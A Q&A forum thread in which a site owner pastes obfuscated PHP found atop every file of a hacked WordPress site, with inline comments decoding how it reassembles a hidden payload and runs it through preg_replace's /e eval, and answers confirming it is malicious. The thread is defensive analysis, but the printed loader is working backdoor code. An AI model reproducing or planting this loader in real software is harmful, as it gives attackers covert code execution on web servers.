
I'm pretty sure that we have malware in our WordPress website. Here is the code in question; it is located at the top of every PHP file in the website:

{ $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) && (! strstr($ua,"\x72\166\x3a\61\x31")) && (! strstr($ua,"\x61\156\x64\162\x6f\151\x64")) && (! strstr($ua,"\x6d\157\x62\151\x6c\145")) && (! strstr($ua,"\x69\160\x68\157\x6e\145")) && (! strstr($ua,"\x69\160\x61\144")) && (! strstr($ua,"\x6f\160\x65\162\x61\40\x6d"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php /* NOTE(review): loader analysis, derived only from the escapes visible in this listing.
 * The brace block before this tag lower-cases $_SERVER["HTTP_USER_AGENT"] and sets
 * $GLOBALS["anuna"] = 1 when the User-Agent contains none of: msie, rv:11, android,
 * mobile, iphone, ipad, "opera m". The statement that opens that brace block is not
 * part of the paste.
 * $asxjhvtsgx below is a single-quoted blob that runs across several lines; at this
 * point it is only data, and the line breaks inside it belong to the string. */ $asxjhvtsgx = '2]y76]62]y3:]84#-!OVMM*<85csboe))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c%x7825j>1<%x57825c:>1<%x5c%x7825b:>1<!gps)%x5c%x78x5c%x7822)!gj}1~!<2p%x5c%x7825%x5c%x787f!~!<##!>!2p%x5x7825tjw!>!#]y84]275#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x787825V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XAZASV<*24%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%xw%x5c%x7825)ppde>u%x5c%x7825V<#65,47R25,d::::::-111112)eobs%x5c%x7860un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825!|!MFT%x5c%x7860QIQ&f_UTPI%x5c1GO%x5c%x7822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%xy74]256#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]y76]277x782f7#@#7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x7825%x5c%x7827jsv%x5*j%x5c%x7825!-#1]#-bubE{h%x5c%x7825)tp5fubmgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:*61"])))) { 
$GLOBALS["%x61%1568]248]y83]256]y81]265]y72]254]y76]61]y33]68]y34]68]y}.;%x5c%x7860UQPMSVD!-id%x5c%x7825)uqpuft%x5c%x7860msvd},;uqpuf%x7825<#462]47y]252]18y]#>q%x5c%x7825<#762]67y]562]38y]57]y72]265]y39]271]y83]256]y7CW&)7gj6<.[A%x5c%x7827&6<%;!opjudovg}k~~9{d%x5c%x782<.4%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%2]48y]#>m%x5c%x7825:|:78Bsfuvso!sboepn)%x5c%x7825epnbss-%x5c%x7825r%c%x78246767~6<Cw6<pd%x5c%x7825w67827pd%x5c%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyx5c%x7825)utjm!|!*5!%x5c%x5c%x782f%x5c%x7825r%x5c%x7878<~!!%x5x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x782]y83]248]y83]256]y81]265]y72]254]y76#<%x5c%x7825tmw!>!#]y84]275]y83]2bek!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Z<#opo#>b%x5c%x7825!*##>>>!%x5c%x78242178}527}88:}334}472%x5c%x7824<!%x5c%x7825mm!>!#]f#00;quui#>.%x5c%x7825!<***f%x5c%x7827,*e%x5c%x78x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7y81]273]y76]258]y6g]273]y76]27%163%x74%162%x5f%163%x70%154%x69%164%50%x22%134%x78%62%x35%165%x5c%x782272qj%x5c%x7825)7gj6825tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]25j:>1<%x5c%x7825j:=tj{fpg)%)323zbe!-#jt0*?]+^?]_%x5c%x785c}X%x5c%x7824<!%x7825)7fmji%x5c%x78786<C%x5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5c%!|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%p!*#ojneb#-*f%x5c%x7825)sf%x5825c*W%x5c%x7825eN+#Qi%x5c%x785c1^W%x5c%x7825c!>!%x5273]y76]271]y7d]252]y33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]8c%x785cSFWSFT%x5c%x7860%x5c%x782782f#%x5c%x782f},;#-#}+;%x5!gj<*#k#)usbut%x5c%x7860cpV%x5c%x787f%x5c%x787f%x5c%x83:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#ujoj824-%x5c%x7824y4%x5c%x7824-%x5c%x7824]y8%x5c%x7824-%x5c%x7824]26%UUI&c_UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323z*#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+fmhpph#)zbssbdof.)fepdof.%x5c%x782f#@#%x5c%x782fqp%x5c%x7825>5h%x5c%x7825!<*f%x5c%x7825z<jg!)%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf!%urn chr(ord($n)-1);} 
@error_report7825kj:!>!#]y3d]51]y35]256]y76]72]y3d]51]y35]274]y4:]x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]21c%x7825>%x5c%x782fh%x5c%x7825:<**#57]38y4tvctus)%x5c%x7825%x5c%x7824-%x5c%x7824x5c%x7825_t%x5c%x7825:osvufs:~:<*9-1-r%x5c%x7825)s%x5q%x5c%x7825>2q%x5c%x7825<#g6R85,825!-#2#%x5c%x782f#%x5c*r%x5c%x7825:-t%x5c%x7825)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!82]y3:]62]y4c#<!%x5c%x7825t::!>!%x5c%x7824Ypp3)%x5c%x75%156%x61"]=1; function fjfgg($n){retx5c%x7825z>2<!%x5c%x7825ww2)%x5cRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*!fyqmpef)#%x5c%x7824*<!%x5c%xx78256<*Y%x5c%x7825)fnbozcYufhA%x5c%x78272qj%x5c%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#%x7824-%x5c%x7824-!%x5c#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)x5c%x7824-%x5c%x7824<%x5c%x7825j,,*!|%x5c%x825j:>>1*!%x5c%x7825b:>1<!fmtx7860GB)fubfsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%825+*!*+fepdfe{h+{d%x5c%x7825)+opjudovg+)!gj+{e%x5cc%x7825-qp%x5c%x7825)54l}%x,j%x5c%x7825>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,9275ttfsqnpdov{h19275j{hnpd19272p%x5c%x7825!*3>?*2b%3of>2bd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#0#%x55s:%x5c%x785c%x5c%x7825j:^<!%x5c%x7825w%057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5y3e]81#%x5c%x782f#7e:55946-tr.984:7597-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOd#)tutjyf%x5c%x7860opjudovg%%x5c%x78257-C)fepmqnjA%c%x7825j=6[%x5c%x7825ww2!>27,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x7827)fepc%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%x78257>%x5c%x782f7&6|7**11%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860Q57%x65","%x65%166%x61%154%x28%151%x6d%160%x6c%7825-*.%x5c%x7825)euhA)824*<!%x5c%x7824-%x5c%x7824gps)%x5c%x7825j>1<%x5c%x%x7825%x5c%x7824-%x5c%x7824*!|!%]1%x5c%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rc%x782f*#npd%x5c%x782f#)rrd%x5c%x7821]y7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x7824]25%x5c3:]68]y76#<%x5c%x78e%x5c%x78b%x5c%x7825w:!>!%x55c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!~<3r.93e:5597f-s.973:8297f:5297e:56-
%x5c%x7878r.985:52985-t.98]K4]%x5c%x7827pd%x5c%x782_*#[k2%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;u%x7825cB%x5c%x7825iN}#-!tussfw)%x5c%x7!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%x5c%x7860hfsq)!s73]y76]277#<%x5c%x7825t2w>#]y74]273]y765c%x7827;%x5c%x7825!<*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f]47]67y]37]88y]27]28y]#%x5c%x782fr%c%x7878pmpusut)tpqssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+99386c6f+9f5d81*#ppde#)tutjyf%x5c%x78604%#zsfvr#%x5c%x785cq%x5c%x7825)ufttj%tutjyf%x5c%x7860opjudovg)74]256]y39]252]y83]273]y72]282#<!%x5c%f%x5c%x7824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x725bbT-%x5c%x7825bT-%x5c%x7825hW~%)%x5c%x7825tww**WYsboepn)%x5c%x7825bss-%x5c%x7825r%x5c%x7878B%x5c%x7825fdy)##-!#~<%x5c%x5}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%x5c%x5c%x7827;mnui}&;zepc}A;~!}%x25tpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]x5c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985-rc%x7827{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7b!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%x7824-tusqpt)%x5c%x78%x7825!|!*#91y]c9y]g2y]#>>*4-1-bubE{c%x7825i%x5c%x785c2^<!Ce*[!%x5c%x787824-%x5c%x7824gvodujpo!%x5c%x7824-%xh%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{hnpd!opjudovg!|!**#j{hnp5c%x787f;!|!}{;)gj}l;33bq}k;opjudovg}%x5c%x7878;0]=])0#)U!%x5Z6<.5%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6fs%x5c%x7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*idSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR%x5c%x7827id%x5c%x78b:<!%x5c%x7825c:>%x5c%x7825c%x787fw6*CW&)7gj6<*doj4]275]y7:]268]y7f#<!%x5c%x7825tww!>!%x5c%x782400~:<h%%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5c%x7822!ftmbg)f%x5c%x7827*&7-n%x5c%x7825)utjm6<%x5%x7825w%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x5c%x22%51%x29%51%x29%73", NULL); 
}5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<t78{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825%x7827pd%x5c%x78256<C%x5c%x]252]y85]256]y6g]257]y86]267]y7-Ez-1H*WCw*[!%x5c%x7825rN}#QwTx7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x76:+946:ce44#)zbssb!>!ssbnpe_G65]D8]86]y31]278]y3f]51L3]84]y31M6]%x5c%x7825)kV%x5c%x78tpi}Y;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt!gj!~<ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c%x7825!<**DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6Pvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x7824!>x5c%x7825tzw>!#]y76]277]y72]265]y39]274]y85]273]y6g])sutcvt-#w#)ldbqov>*ofmy%%x5c%x7825}K;%x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x7825)if((function_exists("%x6f%142%x5f%163%x74%141%x72%164") &&c%x7825s:N}#-%x5c%x7825o:W%x5c%x1127-K)ebfsX%x5c%x7827u%x5c%-%x5c%x7824*<!~!dsfbuf%x5c%x7860gx7825!-uyfu%x5c%x7825)3of)fepdof%x5c%x786K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%x7825bG9}:}.}-}!#*<%x5c%x7825nfing(0); preg_replace("%x2f%50%x2e%52%x29%c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;#)8%42%x66%152%x66%147%x67%42%x2cx7878X6<#o]o]Y%x5c%x78257;utpI#7>%x5c%x782f7rfs%x5c%x78256<#ofs%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-2qjW%x5c%x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x5c%d>%x5c%x7825fdy<Cb*[%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x782]445]43]321]464]284]364]6]234]342]58]24]31#-%x5c%x7825tdz*Wsfuvso!qsut>j%x5c%x7825!*72!%x5c%x782787f%x5c%x787f<u%x5c%xUT%x5c%x7860LDPT7-UFOJ%x5c%t%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>>!}_;gvc%x55c%x78b%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT7-NBFS5]241]334]368]322]3]364]6]283]427]36]373P667R37,18R#>q%x5c%x7825V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*wx782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmwc%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x787f!>>%x5tmbg39*56A:>:8:|:7#6#)tutjyf%x5c%x786043c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!%x7825%x5c%x7878:-!%x5c%x7825tzw%x5c%x78225z-#:#*%x5c%x7824-%x5c%
x7824!>!tus%x5c%x7860sfqmbdf)%x5c%x7825%x5c%x7%x5c%x7825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*1%x5c%x7825bss%x5c%x77825:<#64y]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>s%x5cx5c%x78223}!+!<+{e%x5c%x75c%x7825z>!tussfw)%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%x7825wN;#fubfsdXk5%x5c%x7860{66~6<&w6<%xx5c%x787fw6*%x5c%x787fc%x78256<C>^#zsfvr#%x5c%x785cq%x5c%x78257**^x5c%x7878W~!Ypp2)%x5c%x7825zB%x#p#%x5c%x782f#p#%x5c%x782825)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7878:<##:>:h%x5c%x!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%x<**2qj%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]37]278]22X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj3-j%x5c%x7825-bubE{h%x5c%x7825x5c%x7827&6<.fmjgA%x5c%x7827doj%x5c%x78256<%xx3a%146%x21%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y7R17,67R37,#%x5c%x782fq%x5c%x7825>U<#1 (!isset($GLOBALS["%x61%156%x75%156%x157%x64%145%x28%141%x72%162%x61%171%x5f%155%x61%160%x2*!***b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x782f!*6<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#f!%x5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x782556<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x5c6,47R57,27R66,#%x5c%x782f%x7825#%x5c%x782f#o]#%x5c%x782f*5c%x7824y7%x5c%x7824-%x5c%x7x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825%x5c%x7827Y%x5c%x78255:osvufs:~928>>%x5c%x7822:fx5c%x7825w6Z6<.3%x5c%x7860hAx5c%x7825%x5c%x782fh%x5c%x7825)n%x5c%7!hmg%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]}U;y]}R;2]},;osvufs}%x{h%x5c%x7825)sutcvt)esp>hmg%x5c%x7825!<12>j%x5c7825j=tj{fpg)%x5c%x7825%x5c%x7824x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bubE/(.*)/epreg_replaceksaeifhsch';
/* $hfrdbrahhc: chr(163-119) is ",", so the explode() call yields a flat list of
 * offset,length pairs that index into the blob above. */
$hfrdbrahhc = 
explode(chr((163-119)),'7137,58,9360,37,802,29,3201,40,2709,34,7396,41,4301,46,9397,54,7479,31,1719,63,9261,61,4596,47,1192,32,6016,57,1082,42,9842,28,4760,21,9632,38,6582,27,1224,55,6339,36,4182,65,7227,28,1948,64,7510,61,4453,48,7571,51,8058,62,7919,27,3583,58,1782,28,9034,52,3339,45,2796,46,648,65,8808,44,5161,35,9755,60,9506,63,8755,31,6208,24,4088,23,9216,45,6473,46,6073,52,8518,65,4021,39,6125,57,2369,34,3273,37,1030,26,8786,22,4781,40,6804,48,7073,64,883,63,7946,47,8277,54,7437,42,5196,25,8978,56,4643,54,3719,61,713,38,7867,30,9907,39,3445,66,6852,50,9186,30,7048,25,1279,25,10048,58,9968,47,5778,36,5886,69,4060,28,195,54,8371,36,3811,21,3384,38,548,47,4347,23,3832,47,4501,36,1601,49,4137,45,2592,63,452,69,9451,55,2528,64,4859,51,2054,29,5042,25,5067,68,6719,29,521,27,4247,54,2468,60,1472,68,9139,47,2012,42,7288,41,3919,65,2203,32,5479,42,2235,27,3692,27,4949,58,1056,26,9815,27,8331,40,3780,31,751,51,5135,26,8668,25,3641,51,6285,54,2262,53,7897,22,301,64,411,41,9322,38,9670,25,3030,32,8162,59,6783,21,6519,63,9946,22,5521,28,5955,61,5657,62,3062,23,9695,32,1902,46,6996,52,2135,21,5221,38,249,20,1403,69,4910,39,6609,31,6232,53,2977,53,2898,40,5007,35,9870,37,6670,49,8908,70,8603,65,946,57,1124,22,3085,65,1540,61,1689,30,4537,59,3422,23,4421,32,1341,62,2938,39,5719,59,8448,70,2403,65,3511,43,5849,37,9727,28,4370,51,10015,33,7255,33,6937,59,3310,29,2743,53,3150,51,4821,38,2083,52,5814,35,7747,53,1146,46,8852,31,8693,62,6640,30,7622,69,8221,56,5391,62,5606,51,4697,63,6748,35,3984,37,2315,54,5549,57,6902,35,5319,39,1810,64,7329,67,7691,56,5358,33,5453,26,9086,53,8120,42,2842,56,7800,67,8583,20,24,64,1304,37,7195,32,158,37,1874,28,1650,39,3554,29,9569,63,6182,26,3879,40,88,70,4111,26,8883,25,2655,54,3241,32,6375,66,8407,41,5259,60,269,32,365,46,7993,65,595,53,1003,27,831,52,2156,47,0,24,6441,32');
/* $kactddylvg: the 7 characters at offset 10106 of the blob. The blob's visible tail
 * suggests this is the pattern "/(.*)/e" (offset not recounted here; confirm). */
$kactddylvg=substr($asxjhvtsgx,(59690-49584),(38-31));
/* fjfpxissva(pairs, blob): walks the pairs and concatenates
 * substr(blob, offset, length) for each one, i.e. it puts the shuffled slices of the
 * blob back into one string. Defined only if no function of that name exists yet. */
if (!function_exists('fjfpxissva')) { function fjfpxissva($wrevsiuhaw, $fwamswycvq) { $muhwpwyakd = NULL; 
for($fbryohbneh=0;$fbryohbneh<(sizeof($wrevsiuhaw)/2);$fbryohbneh++) { $muhwpwyakd .= substr($fwamswycvq, $wrevsiuhaw[($fbryohbneh*2)],$wrevsiuhaw[($fbryohbneh*2)+1]); } return $muhwpwyakd; };}
/* $ejucbogwei: the hex/octal escapes decode to a statement of the form
 *   eval(str_replace(chr((136-99)), chr((292-200)), fjfpxissva($hfrdbrahhc,$asxjhvtsgx)));
 * padded with two filler comments. chr(37) is "%" and chr(92) is a backslash, so every
 * "%" in the reassembled text is turned into a backslash before the text is evaluated. */
$ejucbogwei="\x20\57\x2a\40\x67\153\x68\153\x63\157\x78\160\x6b\164\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x31\63\x36\55\x39\71\x29\51\x2c\40\x63\150\x72\50\x28\62\x39\62\x2d\62\x30\60\x29\51\x2c\40\x66\152\x66\160\x78\151\x73\163\x76\141\x28\44\x68\146\x72\144\x62\162\x61\150\x68\143\x2c\44\x61\163\x78\152\x68\166\x74\163\x67\170\x29\51\x29\73\x20\57\x2a\40\x74\172\x77\167\x66\152\x78\154\x6c\146\x20\52\x2f\40";
/* $wyrycvdopb: the 12 characters at offset 10113 of the blob, then called as a function
 * name; the blob's visible tail suggests "preg_replace". With the e modifier
 * (deprecated in PHP 5.5, removed in PHP 7.0) the replacement string is evaluated as
 * PHP code, so the call below is what runs the hidden payload. Presumably it does
 * nothing on PHP 7 or later; confirm against the server's PHP version. */
$wyrycvdopb=substr($asxjhvtsgx,(49319-39206),(43-31)); $wyrycvdopb($kactddylvg, $ejucbogwei, NULL);
/* The remaining assignments only overwrite the working variables: $wyrycvdopb ends as
 * the integer 121 and $asxjhvtsgx as 120. */
$wyrycvdopb=$ejucbogwei; $wyrycvdopb=(597-476); $asxjhvtsgx=$wyrycvdopb-1; ?>

I'd just like to confirm whether this is malicious code or not. If so, what is it designed to do?

(Mainly I'd just like a yes or no answer to whether it is malicious or not so I can take appropriate action)

Thanks in advance

Sam Bonell
  • Seems similar to the code [here](http://security.stackexchange.com/questions/70579/is-this-a-backdoor). I'd need some tooling to get past the obfuscation. – S.L. Barth Jul 20 '15 at 13:38
  • Thanks for the quick reply - Could you confirm that this is malicious? – Sam Bonell Jul 20 '15 at 13:40
  • Yes it is definitely malicious; I had to deal with [similar code on my own server](http://security.stackexchange.com/questions/84454/need-help-deobfuscating-malicious-php) recently. Some antivirus scanners will even detect it - here are the [scan results](https://www.virustotal.com/en/file/ee94a4c6220cb71c754327c347e1edfda81f02f97e9ce17809dda6bf79f41893/analysis/1437433879/) after uploading the code to Virustotal. (Though it's only Avast and ESET, that's just because not many AV scanners are tuned to detect malicious PHP.) – tlng05 Jul 20 '15 at 23:20

1 Answer


Let's see what we know about this code:

  1. It is obfuscated
  2. You didn't put it there

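So it is malicious beyond reasonable doubt: legitimate code has no reason to hide its strings and function names, and nothing legitimate inserts itself at the top of every PHP file. Treat the site as compromised rather than only deleting the snippet, because whatever wrote it into those files may still have access.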

dr_
  • Thanks - that's all I needed. I'm in a dispute with the "web developer", who doesn't believe me that there is malicious code in the website and is telling me all kinds of rubbish. – Sam Bonell Jul 20 '15 at 14:52
  • So, according to him, what would it be? – dr_ Jul 20 '15 at 15:15
  • He assumed that I had no knowledge of the topic and refused to even check the top line of the code. Basically he said the reason for the issues is that a past employee has passwords (Which they don't) and is deleting files. Very rude indeed. – Sam Bonell Jul 20 '15 at 15:16
  • Time to find a new web developer. – dr_ Jul 21 '15 at 07:01